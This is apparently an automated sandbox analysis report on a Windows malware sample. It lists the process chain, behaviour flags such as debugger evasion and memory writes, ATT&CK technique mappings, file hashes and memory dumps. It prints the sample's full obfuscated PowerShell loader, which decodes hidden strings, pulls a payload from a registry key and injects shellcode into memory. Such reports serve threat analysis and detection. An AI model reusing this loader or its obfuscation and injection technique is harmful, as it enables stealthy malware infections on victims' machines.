Is'Ds5ObDTu0SoBSy1Ca1Mi1Ve8Ti0EuDSy1Au8Tr1Di7Bi1pe0Fr1AaCbr0TaAGe5Be9De4Qu4Te5He9sk2Ni2Cr2PoAly0Fr0Ko0FlAHa0PrDOm1BaCMa1Gk4Af5Sp7Vr2TrBOv0EgCKa1Th7Sy0MoDLu1Ph0Ps1Re4Sa1OvCSc5La7ca3Pa0Wi1Ov7Sy0shDfi1PhCKa0PeBCh1Un6La0In9Sn2PaACr1UdCCa0KnBFa0EvFTy1Re0Br1SaAAn1ScCCa0DkABa5Ha7Ga3ti4Ek1Sa8No0InBFr0EfACo1Pe1Le1Fa8Kl1Ju5Wi2Uo4Fi4Mo3Po4Sd3Gl3HyEfr1FrCFi0RaDVa3JoDEp1PrCGu1Da5cr1AgCEp1FrEBi1Bl8Af0TeDud1FoCDe3GoFWa1Gy6Un0SaBOd3UsFdu0BrCAn1Mu7Si1DiASp0CrDWe1Re0Ta1Ku6Eb1In7Di2Ig9Re1Be6Bi1Re0Ch1me7Un0AmDAn1PlCLe0UnBIm5Ti1Re5Ka1Ko1TvFIm1re2de0Ts9Le5Ga9Fr5deDTr2DdBIs1StCse1GiAUn1KaCMe0TaAIn0BeAKi1on0Ci1Ad6Dy1Re7at1GaCCi0DeBDu5Mi9Cu5AaDKw3Gr8Se0diBHa1me4Ca1DeCFo1Ma2Ud1Fr6Ko0SuBeg0Ov9Av0EnAKo0BeAFa4TuDLa5Gr0Me5In5Zo5Ma9Bo5au1Un3BiEOl3NoDdo2DeDGr5co9Ca3En9Ig5Ta1Br2Bl2tj3ge0Bk1Uv7Vk0DuDLi2Pi9De0HoDLu0noBPh2Ko4Me5We5Ko5Ro9Ku2Va2Va2UnCGo3Sa0Aa1Te7Fu0SyDpa4DeAGu4CeBMi2Ka4Lr5Ca5Ku5Ba9Im2Ha2Fo2PaCRe3Ko0No1De7Ta0EnDPu4CoACo4GeBro2In4Bi5Sa5By5Ca9Th2Kl2No2AcCFo3Br0Si1Me7Ar0HjDAf4CoAAl4TrBAf2st4Pu5be0St5Te9Sv5Ca1El2aa2Ph3Tb0Pe1Fo7Un0ReDRe2Al9Ca0DdDRi0LoBFo2In4Un5Th0Ta5bi0Ce5Op0To'ti;Te&Pe(Fo`$keAAnrahmFeeSukHyoPerEnpPessvsvi7Do)Wo Pr`$ViSDiePudFeuPolCaoMouCasAn6To;Se`$BoMRuoBirpogSyeDanImdThubjeAflKaiovgte Ni=ta GlfDekUdpBe Li`$HjABarDamsvetakMeoLirSppprsPasOr5Ab Aa`$AnARorBrmSteUnkReoBerFrpBrsSmsLu6Ce;Ar`$OxSAneAddRauPalDeoPsuWasEs7En Do=se NaHPaTnoBDe Un'Ug5BrDHa2BjDDo1BeCUk0SeBDi1Ko4Eu1Lo0Be1Ag7St1Ti8Ep1Si5kr1Ge2Pl1Dr7Ol0AfCLo1FaDFi1TrCKr0ReBSt0PrANu4TvAFi5Ju9ov4ja4Bi5Ti9Ek5SiDDo0FoBHa1Ci1do1Sc8Af0TrDCo1Sk8He1Fo7Pa1De0Me1QuCLi0PiAAn5Be7Ka3bj0Cy1Un7Sa0CaFMu1Ho6St1Bl2Ek1NoCSl5Me1Br2De2Po3In0Mo1To7My0QuDBa2Fe9St0OpDCa0ChBCo2ts4Af4Mu3Kr4Be3St2ta3Se1CoCTu0PaBAn1Rh6Bu5No5Un5Al9Pt4LoAOu4QuCGr4DuFfe5Mo5Am5Me9El4tr9Fu0bi1Re4DiAWi4Fo9Ne4Su9Ex4Me9Pe5Bi5Ha5Pu9Fu4Su9Sa0ce1Sm4MiDAx4Su9Ar5Un0Kr'Af;vi&Ca(Sp`$ToAGurSumInevakKvoDdrUlpFrsTrsBr7Be)Sa Co`$ChSDieDrdRiuAalPloNeuLista7Be;Qu`$QuSSueRedSpuPilOpoFiuArsWa8Ri Ma=Un IvHWhTTiBro Ga'br5PeDUn3Om4To1Ba8Fo1Au7Aq1TrDgu1Im1Im1Ty8Br1AnFSh0LaDar1fy0Ha1buESt1CoCDe0HeABu5La9Wr4Af4Sp5Fl9Un5DiDBy0HyBMe1Sh1Ar1De8Bi0LoDRa1Th8Fu1De7Ln1De0St1FrCSn0ReAFi5We7Ef3In0Ch1Dr7Ov0KoFqu1Be6Be1Fo2Be1inCFo5Sa1Va2Al2Hy3Sc0Sh1Ga7Be0TrDCo2Tl9Kn0MiDLu0NuBFa2Un4Hu4In3Ni4An3Za2Be3Ou1FoCSu0SkBEl1Se6Ra5Fo5Au5To9Ot4Ka9Be0Ne1Sc4co8Un4Dr9ut4Va9Ma4va9sa4Un9ku4Re9Va5Am5Fo5Ry9Ja4hi9Ar0Id1Ba4HaAFo4Le9Hy4Un9Af4Ho9Su5Re5Re5Na9De4Op9Di0sh1Ob4StDkl5Fo0Io'Ky;Fo&Va(Hu`$SaAChrAmmGteypkCroVarUkpInsHysBy7Do)Ma Af`$DuSBaeAmdBeuBrlInoSuuStsRa8Pr;fi`$ReASksBrkbaeRstRorResRe=La(MiGbreDotSe-TiISutReeMamZaPUnrCioBapPeeAlrFotUnyRe aa-QuPUtaFrtInhRe De'VoHFjKHuCBiUCo:Pe\viSEsaBunAndFivPaiAagMabSioLueTanUn\ImNNeeFopCotAnuWhnAkiTiadunSk'La)Su.MiPUnlVraJoyFepGaeDinInsSk;Ja`$GrSHaePidUnuFalHyoFuuTjsAk9St Fl=De DeHTmTErBLe Ub'Aa5LaDca2DeAra1AgCEx1RaDDi0inCSe1Kv5Co1Pa6Ud0BeCde0SkAAf5Un9Re4Ec4Ca5Su9he2Mo2Bu2UdATi0Bi0Pe0ReAOf0TrDEa1KaCSy1Ad4Mo5Fy7Va3TrARu1Sp6Ba1Dg7Up0PrFTa1ToCTj0phBJu0FoDar2Dr4sp4Do3Su4Re3St3LaFGe0GrBBi1Ta6pa1Se4Dy3SaBKl1Mu8Sg0MaAAb1KeCug4UnFCo4LnDSi2AuACh0DoDtr0GeBSt1Fi0Co1Us7Oc1ThEne5ti1Ea5enDCa3An8Hy0MiAVa1Sk2Un1SkCMu0ArDTr0NdBSo0SeATh5Ki0Fi'Ls;Di&Co(At`$StAMyrRamTyemakKooMarorpPasAfsGe7Hj)ti Di`$PaSNeeLedMouUdlPuoAruDasBe9th;Ej`$VeAPisApkCaeEjtNorEnsSc0Ka Ko=Sa ErHBuTElBRa so'Ti2In2Cr2PaASu0Ci0Me0ReAKl0unDEj1OvCCa1Fa4In5Fl7Im2MiBSp0MoCde1Sy7Go0GeDSa1Fu0Pi1Po4Ku1PaCGl5Mr7Bo3Se0Ke1Sl7Sp0CoDBe1SyCRe0SoBPr1Kl6He0Fr9Sm2unASe1sjCKr0FoBSu0UaFIn1Fo0Be1UnAMn1AnCIs0UnAKo5Un7In3Fl4Ei1Sm8De0StBIk0BlAPt1An1Kl1Kk8No1Be5Ro2Ch4En4Su3Fl4Dy3De3MiAEn1Kr6Li0Kl9Ve0Un0Hv5Fi1Ti5WhDBr2EnADo1CaCIn1TrDTe0MoCau1Fl5In1Hi6Ny0EfCCa0FdAGa5Bl5Bl5Ho9Pr4Sk9Eg5In5Po5Er9Te5Sl9Od5InDGa2PoDSi1McCUp0ReBUn1Si4Ru1Ak0Ha1Bo7Dr1Fn8Br1Ej5Sa1St2da1Jo7Mi0isCSo1KaDin1KiCTi0MoBSk0CyADy4UnAHo5Ho5Tv5Fu9Pl4PsARe4UnCFi4FoFFu5Sj0Bo'Be;Sa&St(Da`$DeAMorFrmtieUmkGroBrrCapBasDosRe7Zl)un Kl`$SnADisAnkEmeEktBerEdsBe0Hv;Du`$EnkFaoAbrJotLgeWrgLeeOprKanSpeSp=Ar`$EtSEneAedAfuAglNeoSpuVasPs.RecleoMeuFrnKotTr-Fe3pr5Bo6En;Se`$BeABasStkSaeIntInravsBr1pr De=Pr UpHHeTKoBha Un'Sl2Ve2br2RdASa0Ta0Wa0VaAOs0PoDAl1SpCDe1Sa4Be5So7Li2IdBMu0PtCBa1Ud7Sp0PaDAl1No0Bu1Cl4No1BrCGr5Ti7La3Co0Te1La7Pa0XiDFo1FlCOp0FuBMi1In6Kk0Af9Pe2InACo1TiCEx0LaBSu0daFra1Bl0Gu1BaAco1WiCMe0AvASq5Un7Il3Fu4Sk1bj8Un0TrBUd0TuAUp1Gu1Sa1Fa8Pr1Ho5Up2Pr4Sp4Le3Ri4ir3Fo3SpAMo1Sl6vi0Ar9Di0Co0He5Un1Ma5ShDIm2ShAJo1TuCSu1VgDKm0FrCfo1Ud5re1At6Do0SwCFo0MaAJa5De5Re5do9Mo4ElAPr4FrCsj4NiFDi5Ki5Ma5Pa9Ba5UdDil3Di4Ar1be8Pr1Me7Sa1ApDVe1Wa1Jv1my8Pr1GaFPr0PaDSp1Wh0Go1foEKr1MoCTa0KiARa5Po5Ci5Ma9or5BlDHy1En2Ny1Op6Ve0CeBSp0HaDSa1UnCBa1ExEsi1AmCAf0FaBHa1Ca7Fr1foCTr5Be0Ad'Dr;Ne&Ad(in`$AnATrrAlmDeeUnkFloLerPapFjsSisUn7In)Ba Ce`$UnAExsDykCeeditOmrCassu1Di;Le`$PaATrsPekMaeKatDurAnsPe2Dr Re=Na chHOpTSuBUn Be'Ra5OvDSp2GiCLy1PrDLe0SyARe0PoDPi1De0Er1BrEBr1Jo7Gr1No0tr1op7Mi1SkEAn0neAUa5Re9Os4Ro4Sv5fl9Sa2Ja2La2psASw0Ps0Et0SpAsy0BoDAd1RaCSp1No4So5Ho7Pr2noBGr0LgCNa1St7Re0UdDSy1Ko0Oz1La4az1ThCEn5Ca7Li3Ap0Pr1Ti7gr0FiDAg1GoCSk0FaBSp1Mi6No0Ps9Jo2FaASi1PrCBi0UnBVa0TyFNe1Tr0Va1SeAVe1ToCPa0FlADi5Be7Mo3Br4Dy1Er8sa0ThBKo0ReAUr1No1Po1St8Yp1Uk5Am2Sn4Su4Di3dr4To3Vi3SuEKo1CoCFr0DeDFa3RaDVi1ByCFo1ae5Ra1VuCSi1KaESk1ne8Is0RuDAc1UlCMn3teFEg1Po6Hy0PiBMu3TaFTy0InCGr1ko7In1PaACr0OmDgr1Em0Ba1Ne6Un1Ju7Ru2Om9Se1Hi6Fa1Tv0Ha1ov7Be0GiDSy1SaCPs0LaBIs5Gr1Om5KaDHo2PiDNa1OuCLi0ReBFl1Da4Ko1ru0Ou1Er7Im1Cy8Xi1Op5Ab1Ar2Mi1Ma7Hu0TaCLy1AkDGa1ShCKr0FaBSc0SpAAt4KoASt5Pe5Re5Tr9Kl5br1kr3NoEgo3BaDRe2GrDWi5Su9Ue3Hi9Di5Af1Br2Ge2Un3He0Fl1Ha7od0MaDco2Re9Ef0SoDAk0AcBGg2Al4Su5In5De2To2Pl3En0Ch1ly7no0anDov2Sa9Di0CoDkr0MaBen2Ud4Oc5Un0jo5Se9As5Me1Tr2Ky2Ut2UnFUm1fr6Fd1Kr0Bj1foDIc2Kl4Ne5Ma0Mo5Ar0Ve5Re0Is'La;Am&Me(yd`$SpAchrGgmBnePakReoEirGupAfsBesGa7Di)No Va`$FaAResBrkDeeSutSirAdsOf2In;Km`$AlABosBrkGeeChtWirSysla3Sc Ba=Sm miHBlTreBOp An'Fo5DiDSl2DoCIm1teDBr0PrAEt0UnDSt1ov0Om1VeEAr1Pe7Pr1Mo0Sy1Ci7Cl1UnEPi0RiAFa5Ag7fr3Li0Er1Un7Gi0PaFNa1Ak6Ev1Ba2Ka1UnCDo5Bi1De5beDBi3An4br1St8Ta1Br7En1BeDFi1Bi1By1Fi8Wi1HoFBu0AaDDe1Er0Bl1AfEAn1SkCCo0CyAPr5Ob5Re5KnDHa3Qu4Ud1Vi6Be0PiBHe1SkESt1SyCId1Aw7Pr1BaDUk0EsCSl1StCUn1In5Da1Co0Di1MiEKe5Un0Sk'Ko;To&Un(ty`$SoAQurPimByeMbkVaoBlrElpWhsMosUg7di)an Le`$BeASasFakUaeMutCarStsSn3Kp#Pa;""";Function Asketrs9 { param([String]$Galdebrrene); For($Jeunes=2; $Jeunes -lt $Galdebrrene.Length-1; $Jeunes+=(2+1)){ $Privatudgiften = $Privatudgiften + $Galdebrrene.Substring($Jeunes, 1); } $Privatudgiften;}$synoecete0 = Asketrs9 'KlIBaEInXRa ';$synoecete1= Asketrs9 $Acopyrin;if([IntPtr]::size -eq 8){START-job { param($Kunstkendernes) powershell $Kunstkendernes } -RunAs32 -Argument $synoecete1 | wait-job | Receive-Job;}else{&$synoecete0 $synoecete1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2340

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Galdebrrene); $Tilstedevrendes = New-Object byte[] ($Galdebrrene.Length / 2); For($Jeunes=0; $Jeunes -lt $Galdebrrene.Length; $Jeunes+=2){ $Tilstedevrendes[$Jeunes/2] = [convert]::ToByte($Galdebrrene.Substring($Jeunes, 2), 16); $Tilstedevrendes[$Jeunes/2] = ($Tilstedevrendes[$Jeunes/2] -bxor 121); } [String][System.Text.Encoding]::ASCII.GetString($Tilstedevrendes);}$Quar0=HTB '2A000A0D1C14571D1515';$Quar1=HTB '34101A0B160A161F0D572E10174A4B572C170A181F1C37180D100F1C341C0D11161D0A';$Quar2=HTB '3E1C0D290B161A381D1D0B1C0A0A';$Quar3=HTB '2A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F';$Quar4=HTB '0A0D0B10171E';$Quar5=HTB '3E1C0D34161D0C151C3118171D151C';$Quar6=HTB '2B2D2A091C1A1018153718141C555931101D1C3B002A101E5559290C1B15101A';$Quar7=HTB '2B0C170D10141C5559341817181E1C1D';$Quar8=HTB '2B1C1F151C1A0D1C1D3D1C151C1E180D1C';$Quar9=HTB '3017341C14160B0034161D0C151C';$Armekorpss0=HTB '34003D1C151C1E180D1C2D00091C';$Armekorpss1=HTB '3A15180A0A5559290C1B15101A55592A1C18151C1D555938170A103A15180A0A5559380C0D163A15180A0A';$Armekorpss2=HTB '30170F16121C';$Armekorpss3=HTB '290C1B15101A555931101D1C3B002A101E5559371C0E2A15160D55592F100B0D0C1815';$Armekorpss4=HTB '2F100B0D0C1815381515161A';$Armekorpss5=HTB '170D1D1515';$Armekorpss6=HTB '370D290B160D1C1A0D2F100B0D0C1815341C14160B00';$Armekorpss7=HTB '303C21';$Armekorpss8=HTB '25';function fkp {Param ($Vitalise118, $Khatri38) ;$Sedulous0 =HTB '5D1B16171D1C1F18171E1C0D59445951223809093D16141810172443433A0C0B0B1C170D3D1614181017573E1C0D380A0A1C141B15101C0A51505905592E111C0B1C54361B131C1A0D5902595D26573E15161B1815380A0A1C141B15003A181A111C595438171D595D265735161A180D101617572A0915100D515D380B141C12160B090A0A415022544824573C080C18150A515D280C180B4950590450573E1C0D2D00091C515D280C180B4850';&($Armekorpss7) $Sedulous0;$Sedulous5 = HTB '5D321C0D1A110C09091C170A5944595D1B16171D1C1F18171E1C0D573E1C0D341C0D11161D515D280C180B4B5559222D00091C2224245939515D280C180B4A55595D280C180B4D5050';&($Armekorpss7) $Sedulous5;$Sedulous1 = HTB '0B1C0D0C0B17595D321C0D1A110C09091C170A5730170F16121C515D170C151555593951222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F2451371C0E54361B131C1A0D592A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F5151371C0E54361B131C1A0D5930170D290D0B505559515D1B16171D1C1F18171E1C0D573E1C0D341C0D11161D515D280C180B4C50505730170F16121C515D170C1515555939515D2F100D1815100A1C4848415050505055595D3211180D0B104A415050';&($Armekorpss7) $Sedulous1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Cigaretters,[Parameter(Position = 1)] [Type] $Overcool = [Void]);$Sedulous2 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C594459223809093D16141810172443433A0C0B0B1C170D3D1614181017573D1C1F10171C3D00171814101A380A0A1C141B15005151371C0E54361B131C1A0D592A000A0D1C14572B1C1F151C1A0D10161757380A0A1C141B15003718141C515D280C180B4150505559222A000A0D1C14572B1C1F151C1A0D101617573C14100D57380A0A1C141B15003B0C10151D1C0B381A1A1C0A0A2443432B0C1750573D1C1F10171C3D00171814101A34161D0C151C515D280C180B4055595D1F18150A1C50573D1C1F10171C2D00091C515D380B141C12160B090A0A4955595D380B141C12160B090A0A485559222A000A0D1C1457340C150D101A180A0D3D1C151C1E180D1C2450';&($Armekorpss7) $Sedulous2;$Sedulous3 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C573D1C1F10171C3A16170A0D0B0C1A0D160B515D280C180B4F5559222A000A0D1C14572B1C1F151C1A0D101617573A18151510171E3A16170F1C170D1016170A2443432A0D18171D180B1D55595D3A101E180B1C0D0D1C0B0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D280C180B4E50';&($Armekorpss7) $Sedulous3;$Sedulous4 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C573D1C1F10171C341C0D11161D515D380B141C12160B090A0A4B55595D380B141C12160B090A0A4A55595D360F1C0B1A16161555595D3A101E180B1C0D0D1C0B0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D280C180B4E50';&($Armekorpss7) $Sedulous4;$Sedulous5 = HTB '0B1C0D0C0B17595D2A0C091C0B1F160A1F180D1C0B171C573A0B1C180D1C2D00091C5150';&($Armekorpss7) $Sedulous5 ;}$Recessioner = HTB '121C0B171C154A4B';$Sedulous6 = HTB '5D0B11180D1817101C0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B51511F1209595D2B1C1A1C0A0A1016171C0B595D380B141C12160B090A0A4D505559513E3D2D5939512230170D290D0B245559222C30170D4A4B245559222C30170D4A4B245559222C30170D4A4B245059512230170D290D0B24505050';&($Armekorpss7) $Sedulous6;$Morgenduelig = fkp $Armekorpss5 $Armekorpss6;$Sedulous7 = HTB '5D2D1C0B141017181512170C1D1C0B0A4A5944595D0B11180D1817101C0A5730170F16121C512230170D290D0B244343231C0B1655594A4C4F555949014A494949555949014D4950';&($Armekorpss7) $Sedulous7;$Sedulous8 = HTB '5D3418171D11181F0D101E1C0A5944595D0B11180D1817101C0A5730170F16121C512230170D290D0B244343231C0B1655594901484949494949555949014A494949555949014D50';&($Armekorpss7) $Sedulous8;$Asketrs=(Get-ItemProperty -Path 'HKCU:\Sandvigboen\Neptunian').Playpens;$Sedulous9 = HTB '5D2A1C1D0C15160C0A594459222A000A0D1C14573A16170F1C0B0D2443433F0B16143B180A1C4F4D2A0D0B10171E515D380A121C0D0B0A50';&($Armekorpss7) $Sedulous9;$Asketrs0 = HTB '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2A1C1D0C15160C0A5559495559595D2D1C0B141017181512170C1D1C0B0A4A55594A4C4F50';&($Armekorpss7) $Asketrs0;$kortegerne=$Sedulous.count-356;$Asketrs1 = HTB '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2A1C1D0C15160C0A55594A4C4F55595D3418171D11181F0D101E1C0A55595D12160B0D1C1E1C0B171C50';&($Armekorpss7) $Asketrs1;$Asketrs2 = HTB '5D2C1D0A0D101E1710171E0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B515D2D1C0B141017181512170C1D1C0B0A4A5559513E3D2D5939512230170D290D0B24552230170D290D0B24505951222F16101D24505050';&($Armekorpss7) $Asketrs2;$Asketrs3 = HTB '5D2C1D0A0D101E1710171E0A5730170F16121C515D3418171D11181F0D101E1C0A555D34160B1E1C171D0C1C15101E50';&($Armekorpss7) $Asketrs3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
57KB

MD5
510fb341adfb9c69e7c84dc568d9ea10

SHA1
3d218a784b3d07fdc55f5be6ccb8007527822d85

SHA256
fc589c141d2cd998c37e74a44366d70ae2cc3ddae8b4ee799a517fd9f59adc74

SHA512
c3b88ddacc02eeff79df3aa65bad52d6f002a29cb2be25a6e284701838ea7c6930896ebdfe885f9dfd0ad9dd3d12e2747d3718e024c36af73ad65206e58434be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
57KB

MD5
3d31e4270e6523a20c85e7e23dfcfd11

SHA1
4d74a93fb0b9a74bf981367429dbc04839994341

SHA256
ffccc85c0f9c4e5729cb186daaa6cb785ccd3a4ea73c0fe781820f724d8f8c9e

SHA512
eceeacbbd3661df753d3d6803259109f4eb5083c055efd44bbc1bdbf4e2660ee35d23877a343a95ed7902320bfe63d6986bf11807a182cf6d1b4a44e33f27237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
54KB

MD5
6f7f14434270605de35dabc27b051335

SHA1
022ed64a8f9a5a20dbf9d25b6f18de1cf456c6c1

SHA256
b9c7f082a8a1d4149e56f587ab07bb507b33a59972c4ecd4548c00d27b2be4d5

SHA512
195d931cb7e22daf10770a270b1634f94d26f56e4a08b4d7da9c4ff6422bc515ec039da69750fbe229833838111d35a47d923139cc8485354036a9cf87960287

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
54KB

MD5
5392feb4e1f0890a4fd52da91e903ff8

SHA1
ebfbd4007aef17eb0aa7c53d64be99a7190c12dd

SHA256
570ee54d62a293e575cf44333cdce07e8c8997f8ea4ba814500368d388679437

SHA512
a073006c3c0f18d1c0e1603de51b49cc16cd7450d6ea63dee010c7d95b90cebf6f9c1570f407ef0991575f709c113ecf5129e160fbfd96740bb056f0a3cb452e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
54KB

MD5
691b637201d795093b0748d035d357e1

SHA1
49940e64afd3bd53705657b97ed451d039cdefd5

SHA256
99b25062f529b83e13ca6433febbb26d980bf263722bdf8a16f6bffb460509a1

SHA512
1dd0090aa8a7cd00ab6e69bbcf714dffadde4fa0bf89434cffc228a317e189da92354eb045be7897dba692c22c05a325285341e22217e73f580e6cd7e4feaed9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
54KB

MD5
f7860b3cc5062c1c667bffb52841ffc5

SHA1
0693a8fda67c93090d22552db8382f04f3740d57

SHA256
de5049ba41863a57877d8c19b38fb3fe078947258d0444f5ae3fbb67bce2314d

SHA512
def35d66baaafb91b58da984488efbf884b1f481d3d36897d2194812aa59533d5854de17ca9a831fc7893ce5be73da5c084127a798e849e555fa288de1cd02c4

Download Submit
memory/2316-169-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/2316-165-0x0000000000D50000-0x0000000000E50000-memory.dmp

Filesize
1024KB

Download
memory/2316-168-0x00007FF98F9D0000-0x00007FF98FBC5000-memory.dmp

Filesize
2.0MB

Download
memory/2316-172-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/2316-177-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/2316-160-0x0000000000000000-mapping.dmp

Download
memory/2316-170-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/2316-162-0x0000000000D50000-0x0000000000E50000-memory.dmp

Filesize
1024KB

Download
memory/2316-174-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/2316-176-0x00007FF98F9D0000-0x00007FF98FBC5000-memory.dmp

Filesize
2.0MB

Download
memory/2316-171-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/2340-135-0x000001C66C3C0000-0x000001C66C5CA000-memory.dmp

Filesize
2.0MB

Download
memory/2340-132-0x0000000000000000-mapping.dmp

Download
memory/2340-152-0x00007FF970810000-0x00007FF9712D1000-memory.dmp

Filesize
10.8MB

Download
memory/2340-134-0x000001C66C030000-0x000001C66C1A6000-memory.dmp

Filesize
1.5MB

Download
memory/2340-133-0x000001C66B2C0000-0x000001C66B2E2000-memory.dmp

Filesize
136KB

Download
memory/2340-136-0x00007FF970810000-0x00007FF9712D1000-memory.dmp

Filesize
10.8MB

Download
memory/2464-146-0x0000000006A20000-0x0000000006A3A000-memory.dmp

Filesize
104KB

Download
memory/2464-137-0x0000000000000000-mapping.dmp

Download
memory/2464-138-0x0000000002E00000-0x0000000002E36000-memory.dmp

Filesize
216KB

Download
memory/2464-139-0x00000000055F0000-0x0000000005C18000-memory.dmp

Filesize
6.2MB

Download
memory/2464-140-0x0000000005510000-0x0000000005532000-memory.dmp

Filesize
136KB

Download
memory/2464-141-0x0000000005C20000-0x0000000005C86000-memory.dmp

Filesize
408KB

Download
memory/2464-142-0x0000000005D80000-0x0000000005DE6000-memory.dmp

Filesize
408KB

Download
memory/2464-143-0x00000000064E0000-0x00000000064FE000-memory.dmp

Filesize
120KB

Download
memory/2464-145-0x00000000072B0000-0x000000000792A000-memory.dmp

Filesize
6.5MB

Download
memory/3724-151-0x00000000075B0000-0x0000000007C2A000-memory.dmp

Filesize
6.5MB

Download
memory/3724-148-0x00000000074E0000-0x0000000007502000-memory.dmp

Filesize
136KB

Download
memory/3724-147-0x00000000076B0000-0x0000000007746000-memory.dmp

Filesize
600KB

Download
memory/3724-164-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/3724-149-0x0000000008860000-0x0000000008E04000-memory.dmp

Filesize
5.6MB

Download
memory/3724-144-0x0000000000000000-mapping.dmp

Download
memory/3724-163-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/3724-161-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/3724-153-0x00000000075B0000-0x0000000007C2A000-memory.dmp

Filesize
6.5MB

Download
memory/3724-175-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/3724-159-0x00000000772D0000-0x0000000077473000-memory.dmp

Filesize
1.6MB

Download
memory/3724-158-0x00007FF98F9D0000-0x00007FF98FBC5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing